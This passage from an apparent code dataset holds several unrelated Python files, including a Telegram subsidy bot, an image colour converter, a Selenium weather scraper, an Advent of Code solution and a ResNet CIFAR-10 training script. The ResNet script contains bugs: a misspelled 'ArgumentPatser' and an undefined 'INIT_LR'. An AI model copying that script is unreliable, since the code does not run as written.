types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(text=\"Сельхозстрахование\", callback_data=\"sh1\")\n but_2 = types.InlineKeyboardButton(text=\"Приобретение элитных семян\", callback_data=\"sh2\")\n but_3 = types.InlineKeyboardButton(text=\"Поддержка племенного крупного рогатого скота мясного направления\", callback_data=\"sh3\")\n but_4 = types.InlineKeyboardButton(text=\"Субсидии на развитие садоводства и чаеводства\", callback_data=\"sh4\")\n but_5 = types.InlineKeyboardButton(text=\"Ознакомиться с другими субсидиями\", callback_data=\"sh5\")\n but_6 = types.InlineKeyboardButton(text=\"Контакты\", callback_data=\"sh\")\n key.add(but_1, but_2, but_3, but_4, but_5, but_6)\n bot.send_message(message.chat.id, \"Субсидии министерства сельского хозяйства и перерабатывающей промышленности Краснодарского края\", reply_markup=key)\n botan.track(constants.botan_key, message.chat.id, message, \"Суб.деп.промышл.\")\n if message.text == \"Служба занятости\":\n key = types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(text=\"Возмещение затрат на подготовку документов, представляемых при государственной регистрации\", callback_data=\"trud1\")\n but_2 = types.InlineKeyboardButton(text=\"Возмещение части затрат на дополнительное рабочее место для трудоустройства безработных граждан\", callback_data=\"trud2\")\n but_3 = types.InlineKeyboardButton(text=\"Единовременная финансовая помощь на открытие индивидуального предпринимателя или юридического лица\", callback_data=\"trud3\")\n but_6 = types.InlineKeyboardButton(text=\"Контакты\", callback_data=\"trud\")\n key.add(but_1, but_2, but_3, but_6)\n bot.send_message(message.chat.id, \"Субсидии службы труда и занятости населения министерства труда и социального развития Краснодарского края\", reply_markup=key)\n botan.track(constants.botan_key, message.chat.id, message, \"Служба занятости\")\n if message.text == \"✒Жалобы и предложения\":\n bot.send_message(message.chat.id, \"Если у Вас есть вопросы, то напишите нам @VSVoronov @avdeev_v\")\n botan.track(constants.botan_key, message.chat.id, message, \"Жалобы и предложения\")\n if message.text == \"📝Консультация On-Line\":\n bot.send_message(message.chat.id, \"Для консультации on-line пишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Консультация On-Line\")\n\nwhile True:\n try:\n\n bot.polling(none_stop=True)\n\n except Exception as err:\n\n logging.error(err)\n\n time.sleep(5)\n\n print\n \"Internet error!\"","repo_name":"JackPot777/mbkuban_telegramBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":59516,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26062216623","text":"class Converter:\n def rgb_to_yiq(self, r_channel: list, g_channel: list, b_channel: list):\n y_channel = []\n i_channel = []\n q_channel = []\n\n for i in range(len(r_channel)):\n y_channel_row = []\n i_channel_row = []\n q_channel_row = []\n\n for j in range(len(r_channel[0])):\n y_value = round(0.299*r_channel[i][j] + 0.587*g_channel[i][j] + 0.114*b_channel[i][j])\n i_value = round(0.596*r_channel[i][j] - 0.274*g_channel[i][j] - 0.322*b_channel[i][j])\n q_value = round(0.211*r_channel[i][j] - 0.523*g_channel[i][j] + 0.312*b_channel[i][j])\n\n y_channel_row.append(y_value)\n i_channel_row.append(i_value)\n q_channel_row.append(q_value)\n \n y_channel.append(y_channel_row)\n i_channel.append(i_channel_row)\n q_channel.append(q_channel_row)\n\n return y_channel, i_channel, q_channel\n\n def _truncate_values_outside_limits(self, value, min_value=0, max_value=255):\n if value < min_value:\n return min_value\n elif max_value < value:\n return max_value\n else:\n return value\n\n def yiq_to_rgb(self, y_channel: list, i_channel: list, q_channel: list) -> (list, list, list):\n r_channel = []\n g_channel = []\n b_channel = []\n\n for i in range(len(y_channel)):\n r_channel_row = []\n g_channel_row = []\n b_channel_row = []\n \n for j in range(len(y_channel[0])):\n r = round(1.0*y_channel[i][j] + 0.956*i_channel[i][j] + 0.621*q_channel[i][j])\n g = round(1.0*y_channel[i][j] - 0.272*i_channel[i][j] - 0.647*q_channel[i][j])\n b = round(1.0*y_channel[i][j] - 1.106*i_channel[i][j] + 1.703*q_channel[i][j])\n\n r_channel_row.append(self._truncate_values_outside_limits(r, min_value=0, max_value=255))\n g_channel_row.append(self._truncate_values_outside_limits(g, min_value=0, max_value=255))\n b_channel_row.append(self._truncate_values_outside_limits(b, min_value=0, max_value=255))\n \n r_channel.append(r_channel_row)\n g_channel.append(g_channel_row)\n b_channel.append(b_channel_row)\n\n return r_channel, g_channel, b_channel","repo_name":"Drayton80/University-DigitalImageProcessing","sub_path":"Converter.py","file_name":"Converter.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21456081045","text":"# coding: utf-8\nimport sys\nimport sublime\n\nst_version = 2\n\nif sublime.version() == '' or int(sublime.version()) > 3000:\n st_version = 3\n from imp import reload\n\nmod_prefix = ''\nreload_mods = []\n\nfor mod in sys.modules:\n if mod.startswith('JoomlaPack') and sys.modules[mod] is not None:\n reload_mods.append(mod)\n\nif st_version == 3:\n mod_prefix = 'JoomlaPack' + mod_prefix\n\nmods_load_order = [\n '',\n\n '.lib',\n\n '.lib.inflector',\n '.lib.inflector.base',\n '.lib.inflector.english',\n\n '.lib.file',\n '.lib.folder',\n '.lib.helper',\n '.lib.json',\n '.lib.manifest',\n '.lib.project',\n\n '.lib.extensions',\n '.lib.extensions.base',\n '.lib.extensions.component',\n '.lib.extensions.package',\n '.lib.extensions.plugin',\n\n '.commands',\n '.commands.component',\n '.commands.package',\n '.commands.plugin'\n]\n\nfor mod in mods_load_order:\n mod = mod_prefix + mod\n if mod in reload_mods:\n try:\n reload(sys.modules[mod])\n except ImportError as e:\n sublime.error_message('Joomla Pack\\n\\n[Error] Modules could not ' +\n 'be imported! %s' % e)\n","repo_name":"renebentes/JoomlaPack","sub_path":"reloader.py","file_name":"reloader.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36437029986","text":"import random\n\nwhile True:\n dice_no = random.randint(1, 6)\n if dice_no == 1:\n print(\" \\n 0 \\n \")\n elif dice_no == 2:\n print(\" 0\\n \\n0 \")\n elif dice_no == 3:\n print(\"0 \\n 0 \\n 0\")\n elif dice_no == 4:\n print(\"0 0\\n \\n0 0\")\n elif dice_no == 5:\n print(\"0 0\\n 0 \\n0 0\")\n else:\n print(\"0 0\\n0 0\\n0 0\")\n\n close_or_restart = input(\"Spin again? enter y for yes and n for no\").lower()\n\n if close_or_restart == \"y\":\n continue\n elif close_or_restart == \"n\":\n break\n else:\n print(\"Incorrect value!!! spinning again!!!\")\n continue\n\ninput(\"Press Enter to exit\")\n","repo_name":"preet-hue/python-mini-projects","sub_path":"Dice-roller.py","file_name":"Dice-roller.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10778513412","text":"from django.test import TestCase\nfrom django.urls.base import reverse\n\nfrom .models import Address, Letting\n\n\nclass LettingTest(TestCase):\n def setUp(self):\n self.address = Address.objects.create(\n number=1,\n street=\"123 rue bidon\",\n city=\"Testville\",\n state=\"Test\",\n zip_code=11111,\n country_iso_code=123,\n )\n self.letting = Letting.objects.create(title=\"youpi\", address=self.address)\n\n def test_index(self):\n url = reverse(\"lettings_index\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertIn(b\"Lettings\", response.content)\n self.assertIn(b\"youpi\", response.content)\n\n def test_letting(self):\n url = reverse(\"letting\", kwargs={\"letting_id\": 1})\n response = self.client.post(url)\n self.assertEqual(response.status_code, 200)\n self.assertIn(b\"123 rue bidon\", response.content)\n","repo_name":"Cocorico84/oc_lettings","sub_path":"lettings/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33368113966","text":"import csv\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nfrom post import auto_mailing\n\n\ndef site_scrapper():\n\n driver = webdriver.Chrome()\n driver.get('https://weather.com/')\n time.sleep(3)\n\n current_url = driver.current_url\n assert current_url.find('weather.com') != -1, 'Wrong URL'\n\n city_list = []\n output_general = []\n with open('input.csv') as f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n if i == 0:\n output_general.append(row)\n else:\n city_list.append(row[0])\n\n for city in city_list:\n input_field = driver.find_element(By.ID, 'LocationSearch_input')\n input_field.send_keys(city)\n time.sleep(3)\n\n search_result = driver.find_element(By.CSS_SELECTOR, '.SearchResults--SearchResults--LUsso').text\n\n if search_result.find('Результаты не найдены') != -1 or search_result.find('No results') != -1:\n output_general.append([\n city,\n '',\n '',\n '',\n '',\n '',\n '',\n '',\n ])\n else:\n first_element = driver.find_element(By.ID, 'LocationSearch_listbox-0')\n first_element.click()\n time.sleep(3)\n\n today_max_min = driver.find_element(By.CSS_SELECTOR, '.CurrentConditions--primary--2SVPh .CurrentConditions--tempHiLoValue--3SUHy').text.split()\n today_weather = driver.find_element(By.CSS_SELECTOR, '.CurrentConditions--primary--2SVPh .CurrentConditions--phraseValue--2Z18W').text\n\n driver.find_elements(By.CSS_SELECTOR, \"#WxuLocalsuiteNav-header-71dadf79-621d-43ff-9a1a-d99a39f16abe .Button--default--3zkvy\")[2].click()\n time.sleep(3)\n tomorrow_max_min = driver.find_element(By.CSS_SELECTOR, '#titleIndex1 .DetailsSummary--temperature--1Syw3').text.split('\\n')\n\n output_general.append([\n city,\n today_max_min[1],\n today_max_min[4],\n today_weather,\n tomorrow_max_min[0],\n tomorrow_max_min[1].lstrip('/'),\n '?',\n '?',\n ])\n\n driver.find_elements(By.CSS_SELECTOR, \"#WxuLocalsuiteNav-header-71dadf79-621d-43ff-9a1a-d99a39f16abe .Button--default--3zkvy\")[0].click()\n time.sleep(3)\n\n print(*output_general, sep='\\n')\n\n with open('output.csv', 'w', newline='') as out:\n writer = csv.writer(out)\n for row in output_general:\n writer.writerow(row)\n\n\nif __name__ == \"__main__\":\n\n site_scrapper()\n auto_mailing()\n","repo_name":"vagrius/web_scrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42176128918","text":"from typing import List\n\nfrom docleaner.api.core.job import Job, JobType\nfrom docleaner.api.services.repository import Repository\n\n\nasync def test_store_large_documents(\n repo: Repository, job_types: List[JobType]\n) -> None:\n \"\"\"Storing and retrieving documents larger than 16 MB, which is the MongoDB BSON\n document size limit. Ensure that the repository implements a workaround to save large documents.\"\"\"\n large_document = b\"X\" * 1024 * 1024 * 20 # 20 MB payload\n jid = await repo.add_job(large_document, \"large.pdf\", job_types[0])\n await repo.update_job(jid, result=large_document)\n job = await repo.find_job(jid)\n assert isinstance(job, Job)\n assert job.src == job.result == large_document\n","repo_name":"magnologan/docleaner","sub_path":"api/tests/integration/repository/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"29562081477","text":"# First import needed modules and javascript support\n# allow import without install\nimport sys\nif \"..\" not in sys.path:\n sys.path.append(\"..\")\n\nfrom jp_gene_viz import js_proxy\n# this loads the proxy widget javascript \"view\" implementation\njs_proxy.load_javascript_support()\nfrom IPython.display import display\n\n# Then create a \"proxy widget\" for the jQueryUI dialog.\nd = js_proxy.ProxyWidget()\n\n# Construct a command to make the widget into a jQueryUI dialog.\ncommand = d.element().html('Hello from jQueryUI').dialog()\n\n# Send the command to the widget view (javascript side).\nd.send(command)\n\n# Display the widget, which causes the command to also execute.\ndisplay(d)\n\nmake_visible = d.element().dialog()\nd.send(make_visible)\n\nd.results # The results from the last command are not particularly meaningful.\n\n# We want to put the html from the widget in this list\nsave_list = []\n\ndef save_command_result(result):\n \"this is the callback we want to execute when the results arrive\"\n #print (result)\n save_list.append(result)\n\n# This \"action\" gets the html content of the widget.\nget_html = d.element().html()\n\n# Send the action to the javascript side for async execution.\nd.send(get_html, results_callback=save_command_result)\n\n# If we look at save_list now, it will probably be empty because the\n# javascript side has probably not responded yet.\nsave_list\n\n# But later we should see the HTML saved in the list.\nsave_list\n\nresult = d.evaluate(get_html)\n# NOTE: Nothing prints. I don't know why.\nprint (result)\n\nprint (result)\n\n# get the DOM element associated with the widget from inside the JQuery container.\nget_dom_element = d.element().get(0)\ndom_element_json = d.evaluate(get_dom_element, level=2)\n\n# Print some info about the JSON for the dom_element sent from Javascript.\nprint(\"got \" + repr(len(dom_element_json)) + \" attributes\")\nfor (i, item) in enumerate(dom_element_json.keys()):\n print(item)\n if i > 10: break\nprint(\"...\")\n\n# Create the widget.\ndp = js_proxy.ProxyWidget()\n\n# Command to populate the widget with an input element with id dp000.\nmake_input = dp.element().html('')._null()\n\n# Command to make the input element into a datepicker and\n# fix the style so the datepicker sits on top of the notebook page.\nfix_style = (\n dp.window().\n jQuery(\"#dp000\"). # get the jQuery input element by id == \"dp\".\n datepicker(). # make it a jQuery UI datepicker.\n css(\"position\", \"relative\").\n css(\"z-index\", \"10000\"). # put it on top\n attr(\"size\", 55). # make it big.\n _null() # we don't care about the command result, discard it.\n )\n\n# Define a python function and data structures to capture\n# values sent to the callback when the datepicker input value changes.\nidentifiers_list = []\narguments_list = []\n\ndef dp_change_handler(identifier, arguments):\n \"Print the results and also store them in lists.\"\n print (identifier, arguments['0']['target']['value'])\n identifiers_list.append(identifier)\n arguments_list.append(arguments)\n \n# Command to create a \"proxy callback\" for the change event.\n# The proxy will translate values to JSON up to 3 levels deep\n# and also send the identifier data \"dp has changed\" to the handler.\nproxy_callback = dp.callback(dp_change_handler, data=\"dp has changed\", level=3)\n\n# Command to associate the proxy callback with the datepicker change event\n# using the standard $(x).change(callback) jQuery method.\non_change_command = dp.window().jQuery(\"#dp000\").change(proxy_callback)\n\n# Send the commands to the Javascript view.\ndp.send_commands([make_input, fix_style, on_change_command])\n\n# display the widget\ndisplay(dp)\n\ndocument = dp.window().document\nnew_input = document.createElement(\"input\")\nsave_input = dp.element()._set(\"saved_input\", new_input)\njson_sent = dp.send(save_input)\n\n# what is the type of the new input element?\nelement_type = dp.evaluate(dp.element().saved_input.type)\n\n# apparently the default type for an input element is \"text\"\nelement_type\n\nnew = dp.element().New\nklass = dp.window().Function\n# from https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function\n# emulate \"new Function('a', 'b', 'return a + b')\"\nadd_function = new(klass, [\"a\", \"b\", \"return a + b;\"])\nsave_function = dp.element()._set(\"my_function\", add_function)\njson_sent = dp.send(save_function)\n\nfunction_evaluation = dp.evaluate(dp.element().my_function(34, 6))\n\nfunction_evaluation\n\nwindow = dp.window()\nih = dp(window.innerWidth)\ndp(window.innerHeight)\ndp(ih)\njson_sent = dp.flush()\n\ndp.results\n\nnew_element_reference = dp.save(\"another_element\", document.createElement(\"input\"))\njson_sent = dp.flush()\nother_element_type = dp.evaluate(new_element_reference.type)\n\nother_element_type\n\nfunction_reference = dp.save_new(\"another_function\", klass, [\"a\", \"b\", \"return a * b;\"])\njson_sent = dp.flush()\nproduct = dp.evaluate(function_reference(5, 2.2))\n\nproduct\n\ndivision = dp.function([\"a\", \"b\"], \"return a / b;\")\ntenth = dp.evaluate(division(1.0, 10.0))\n\ntenth\n\njs_div_mod = dp.save_function(\"div_mod\", [\"a\", \"b\"], \"return {div: Math.trunc(a / b), mod: a % b};\")\ndp.flush()\nd_23_10 = dp.evaluate(js_div_mod(23, 10))\n\n# call the function using the returned reference\nd_23_10\n\n# call the function explicitly via the element namespace.\nd_467_45 = dp.evaluate(dp.element().div_mod(467, 45))\n\nd_467_45\n\njson_sent = dp.send(dp.function([\"element\"], \"debugger;\")(dp.element()))\n\ndp.js_debug()\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/js_proxy example.py","file_name":"js_proxy example.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"347613451","text":"import re\n\nclass Monkey:\n currentItems = []\n operation = \"\"\n nextIfTrue = 0\n nextIfFalse = 0\n id = 0\n inspected = 0\n test = 0\n def __init__(self, startingItems, operation, id, nextIfTrue, nextIfFalse, test) -> None:\n self.currentItems = startingItems\n self.operation = operation\n self.id = id\n self.nextIfFalse = nextIfFalse\n self.nextIfTrue = nextIfTrue\n self.test = test\n\ncurrentMonkeyId = 0\nstartList = []\noperation = \"\"\ntest = 0\nnextIfFalse = 0\nnextIfTrue = 0\nmonkeys=[]\nmodulo = 1\n\nwith open(\"jour11Input.txt\") as lines:\n for line in lines:\n line = line.strip()\n match = re.match(\"Monkey ([0-9]):\", line)\n if match:\n currentMonkeyId = int(match[1])\n continue\n match = re.match(\"Starting items:\", line)\n if match:\n startList = line[16:].split(\",\")\n for i in range(len(startList)):\n startList[i] = int(startList[i])\n continue\n match = re.match(\"Operation:\", line)\n if match:\n operation = line[11:]\n # print(operation)\n # loc = {}\n # old=1\n # new = 0\n # exec(operation, globals(), loc)\n # print(loc[\"new\"])\n continue\n match = re.match(\"Test: divisible by ([0-9]*)\", line)\n if match:\n test = int(match[1])\n modulo *= test\n continue\n match = re.match(\"If true: throw to monkey ([0-9])\", line)\n if match:\n nextIfTrue = int(match[1])\n continue\n match = re.match(\"If false: throw to monkey ([0-9])\", line)\n if match:\n nextIfFalse = int(match[1])\n continue\n monkeys.append(Monkey(startList, operation, currentMonkeyId, nextIfTrue, nextIfFalse, test))\n\nfor round in range(10000):\n print(\"Round :\",round)\n # for monkey in monkeys:\n # print(monkey.id, monkey.currentItems)\n for monkey in monkeys:\n for item in monkey.currentItems:\n monkey.inspected += 1\n old = item\n new = 0\n loc={}\n exec(monkey.operation, globals(), loc)\n new = loc[\"new\"]\n # new = new // 3\n new = new % modulo\n if (new % monkey.test == 0):\n monkeys[monkey.nextIfTrue].currentItems.append(new)\n else:\n monkeys[monkey.nextIfFalse].currentItems.append(new)\n monkey.currentItems = []\n\nfor monkey in monkeys:\n print(monkey.inspected)","repo_name":"Sarth69/AdventOfCode2022","sub_path":"jour11.py","file_name":"jour11.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34053515207","text":"#/usr/bin/env python\n#coding=utf-8\n\nfrom MatchSRNN_Model import *\n\n\nmodel_matchsrnn = MyMactchSRNN(x1_max_length=75,\n x2_max_length=90,\n vocab_size=13407,\n embedding_size=125,\n class_nums=2,\n learning_rate=1e-3)","repo_name":"BJUT2016SoftJunLu/Financial_Intelligent_NLP_Service","sub_path":"MatchSRNN/code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"41436368245","text":"from flask import Flask, request, render_template\r\nfrom flask_cors import cross_origin\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas as pd\r\nimport pyodbc\r\n\r\n\r\n#connection to database\r\nconn = pyodbc.connect('Driver={SQL Server};'\r\n 'Server=DESKTOP-H2PDBDI\\MSSQLSERVER01;'\r\n 'Database=Clinic;'\r\n 'Trusted_Connection=yes;');\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\n@cross_origin()\r\ndef home():\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/datareport\", methods = [\"GET\", \"POST\"])\r\n@cross_origin()\r\ndef data():\r\n option = request.form['exampleRadios']\r\n if option == 'option1':\r\n data = pd.read_sql(\"SELECT * FROM INPatient\", conn)\r\n result=data.to_html()\r\n sns.barplot(x='INPatient_No',y='INPatient_Age',data=data)\r\n plt.xlabel('Patient Id')\r\n plt.ylabel('Age')\r\n plt.title('INPatient ID\\'s with their Age')\r\n plt.savefig('static/INPatient1.jpg')\r\n\r\n sns.kdeplot(data=data['INPatient_Age'])\r\n plt.xlabel('INPatient Age')\r\n plt.title('Age Seperation')\r\n plt.savefig('static/INPatient2.jpg')\r\n result=append_html(result,['INPatient1.jpg','INPatient2.jpg'])\r\n\r\n \r\n\r\n elif option == 'option2':\r\n data = pd.read_sql(\"SELECT * FROM Doctor\", conn)\r\n \r\n result=data.to_html()\r\n sns.barplot(x='Doctor_Fname',y='Doctor_Consultation_Fee',data=data)\r\n plt.xlabel('Doctor Name')\r\n plt.ylabel('Consultation Fee')\r\n plt.title('Doctor with their Consultation Fee')\r\n plt.savefig('static/doc1.jpg')\r\n\r\n sns.barplot(x='Doctor_Fname',y='Doctor_Age',data=data)\r\n plt.xlabel('Doctor Name')\r\n plt.ylabel('Age')\r\n plt.title('Doctor with their Age')\r\n plt.savefig('static/doc2.png')\r\n result=append_html(result,['doc1.jpg','doc2.png'])\r\n elif option == 'option3':\r\n data = pd.read_sql(\"SELECT * FROM Bill\", conn)\r\n result=data.to_html()\r\n sns.barplot(x='INPatient_No',y='Total_Cost',data=data)\r\n plt.xlabel('Patient Number')\r\n plt.ylabel('Total Cost')\r\n plt.title('Patient Number with their Total Cost')\r\n plt.savefig('static/bill1.jpg')\r\n\r\n sns.barplot(x='Bill_Date',y='Total_Cost',data=data)\r\n plt.xlabel('Date')\r\n plt.ylabel('Cost')\r\n plt.title('Bill Date with their total Cost')\r\n plt.savefig('static/bill2.png')\r\n result=append_html(result,['Bill1.jpg','Bill2.jpg'])\r\n\r\n\r\n elif option == 'option4':\r\n data = pd.read_sql(\"SELECT * FROM Checkup\", conn)\r\n result=data.to_html()\r\n \r\n\r\n elif option == 'option5':\r\n data = pd.read_sql(\"SELECT * FROM OUTPatient\", conn)\r\n result=data.to_html()\r\n sns.barplot(x='OUTPatient_No',y='OUTPatient_Age',data=data)\r\n plt.xlabel('Patient Id')\r\n plt.ylabel('Age')\r\n plt.title('OUTPatient ID\\'s with their Age')\r\n plt.savefig('static/OUTPatient1.jpg')\r\n\r\n sns.kdeplot(data=data['OUTPatient_Age'])\r\n plt.xlabel('OUTPatient Age')\r\n plt.title('Age Seperation')\r\n plt.savefig('static/OUTPatient2.jpg')\r\n result=append_html(result,['OUTPatient1.jpg','OUTPatient2.jpg'])\r\n\r\n \r\n return result\r\n\r\n\r\ndef append_html(result,image_names):\r\n for i in image_names:\r\n result=result+\" \"\r\n return result\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"ahasanasultana/Clinic_Management_System","sub_path":"2048025/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72441732912","text":"from typing import List\nimport bisect\n\nclass Solution:\n \"\"\"\n 접근방법\n \n 아이들에게 나누어 줄 수 있는 쿠키의 수를 최대로 하기 위해서 크기가 작은 쿠키를\n greedy factor가 작은 아이에게 먼저 나누어주는 방법을 선택\n \n 따라서 쿠키와 아이들을 모두 오름차순으로 정렬 후\n cookie를 iterate하며 현재 쿠키 사이즈가 greedy factor를 만족하면 결과변수 증가,\n 아니면 다음 쿠키로 넘어가는 방식으로 문제를 풀이하였다.\n \n 그리디 알고리즘으로 분류한 이유는 현재의 상황에서 가장 작은 쿠키를 나누어주고 이후의 상황은 \n 상관하지 않기에 그리디 알고리즘으로 분류했다고 생각한다.\n \"\"\"\n # 두 리스트를 모두 오름차순으로 정렬한 후 \n # 쿠키의 크기가 작은 \n def findContentChildren(self, g: List[int], s: List[int]) -> int:\n # 결과 변수\n count = index = 0\n n = len(g)\n \n # 정렬\n g.sort()\n s.sort()\n \n for cookie in s:\n if cookie >= g[index]:\n count += 1\n index += 1\n \n if index > n - 1:\n break\n \n return count\n \n # 책의 그리디 알고리즘 풀이\n def findContentChildren(self, g: List[int], s: List[int]) -> int:\n g.sort()\n s.sort()\n \n child_i = cookie_j = 0\n # 만족하지 못할 때까지 그리디 진행\n while child_i < len(g) and cookie_j < len(s):\n if s[cookie_j] >= g[child_i]:\n child_i += 1\n cookie_j += 1\n \n return child_i\n \n # 책의 이진 검색 풀이\n def findContentChildren(self, g: List[int], s: List[int]) -> int:\n g.sort()\n s.sort()\n \n result = 0\n for i in s:\n # 이진 검색으로 더 큰 인덱스 탐색\n index = bisect.bisect_right(g, i)\n if index > result:\n result += 1\n \n return result\n \ng = [1,2]\ns = [1,2,3]\nsolution = Solution()\nprint(solution.findContentChildren(g, s))","repo_name":"dhtmaks2540/LeetCode-Algorithm","sub_path":"algorithm_problems/assign-cookies-2.py","file_name":"assign-cookies-2.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42896344068","text":"from typing import List\n\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n counter = {}\n for x in nums:\n if x not in counter:\n counter[x] = 1\n else:\n counter[x] += 1\n\n min_count = 0\n min_index = 0\n top_list = []\n for val, count in counter.items():\n if len(top_list) < k:\n if min_count > count or min_count == 0:\n min_count = count\n min_index = len(top_list)\n top_list.append((val, count, len(top_list)))\n else:\n if count > min_count:\n top_list[min_index] = (val, count, min_index)\n _, min_count, min_index, = min(top_list, key=lambda q: q[1])\n result = []\n for val, _, _ in top_list:\n result.append(val)\n return result\n\n\ns = Solution()\nprint(s.topKFrequent([4, 1, -1, 2, -1, 2, 3], 2))\n","repo_name":"z17/leetcode-solutions","sub_path":"tasks/top-k-frequent-elements.py","file_name":"top-k-frequent-elements.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15355648001","text":"# resnet_cifar10_decay.py\n\nimport matplotlib\nmatplotlib.use(\"Agg\")\n\nimport os\nimport sys\nimport argparse\nimport numpy as np\nimport keras.backend as K\nfrom keras.models import load_model\nfrom keras.datasets import cifar10\nfrom keras.optimizers import SGD\nfrom keras.callbacks import LearningRateScheduler\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom pyimagesearch.callbacks import TrainingMonitor\nfrom pyimagesearch.callbacks import EpochCheckpoint\nfrom pyimagesearch.nn.conv import ResNet\nfrom sklearn.preprocessing import LabelBinarizer\n\nsys.setrecursionlimit(5000)\n\n\nNUM_EPOCHS = 100\nINT_LR = 1e-1\n\ndef poly_decay(epoch):\n # initialize the maximum number of epochs, base learning\n # rate and power of the polynomial\n maxEpochs = NUM_EPOCHS\n baseLR = INIT_LR\n power = 1.0\n\n # compute the new learning rate absed on polynomial decay\n alpha = baseLR * (1 - (epoch / float(maxEpochs))) ** power\n\n # return the new learning rate\n return alpha\n\n\n# construct the argument parse and aprse the arguments\nap = argparse.ArgumentPatser()\nap.add_argument(\"-m\",\"--model\", required = True,\n help = \"path to output model\")\nap.add_argument(\"-o\", \"--output\", required = True,\n help = \"path to output directory (logs, plots, etc.)\")\nargs = vars(ap.parse_args())\n\n# load the training and testing data, converting the images\n# from integers to floats\nprint(\"[INFO] loading CIFAR-10 data...\")\n((trainX, trainY), (testX, testY)) = cifar10.load_data()\ntrainX = trainX.astype(\"float\")\ntestX = testX.astype(\"float\")\n\n# apply mean subtraction to the data\nmean = np.mean(trainX, axis = 0)\ntrainX -= mean\ntestX -= mean\n\n# convert the labels from integers to vectors\nlb = LabelBinarizer()\ntrainY = lb.fit_transform(trainY)\ntestY = lb.transform(testY)\n\naugmentation = ImageDataGenerator(\n width_shift_range = 0.1,\n height_shift_range = 0.1, horizontal_flip = True,\n fill_mode = \"nearest\"\n)\n\n# construct the set of callbacks\nfigPath = os.path.sep.join(\n [args[\"output\"], f\"{os.getpid()}.png\"]\n)\n\njsonPath = os.path.sep.join(\n [args[\"output\"], f\"{os.getpid()}.json\"]\n)\n\ncallbacks = [\n TrainingMonitor(\n figPath, jsonPath = jsonPath\n ),\n LearningRateScheduler(\n poly_decay\n )\n]\n\n# initialize the optimizer and model (ResNet-56)\nprint(\"[INFO] compiling model...\")\noptimizer = SGD(lr = INIT_LR, momentum = 0.9)\n\nmodel = ResNet.build(\n width = 32, height = 32, depth = 3,\n classes = 10, stages = (9, 9, 9),\n filters = (64, 64, 128, 256),\n reg = 0.0005\n)\n\nmodel.compile(\n loss = \"categorical_crossentropy\",\n optimizer = optimizer,\n metrics = [\"accuracy\"]\n)\n\n# train the network\nprint(\"[INFO] training network...\")\nmodel.fit_generator(\n augmentation.flow(\n trainX, trainY, batch_size = 128\n ),\n validation_data = (testX, testY),\n steps_per_epoch = len(trainX) // 128,\n epochs = 10,\n callbacks = callbacks,\n verbose = 1\n)\n\n# save the network to disk\nprint(\"[INFO] serializing network...\")\nmodel.save(args[\"model\"])","repo_name":"positronn/DL4CV2","sub_path":"examples/resnet_cifar10_decay.py","file_name":"resnet_cifar10_decay.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"} +{"seq_id":"8824868692","text":"\"\"\"\nIn this approach we are using `list comprehension` approach to filter data\nbased on certain criteria. Intuitively this should be slower than the\n`vector` method.\n\nWe want to profile it for different datasets.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport time\nimport cProfile\nimport pstats\nfrom io import StringIO\n\nimport pandas as pd\n\nfrom read_sql_data import get_hist_data_as_dataframes_dict\nfrom tickerplot.sql.sqlalchemy_wrapper import get_metadata\n\ndef panel_bench_lc(panel):\n sels = [panel[x]['close'][-1] > panel[x]['close'][-2] \\\n for x in panel]\n return sels\n\ndef panel_bench_vector(panel):\n\n pan2 = 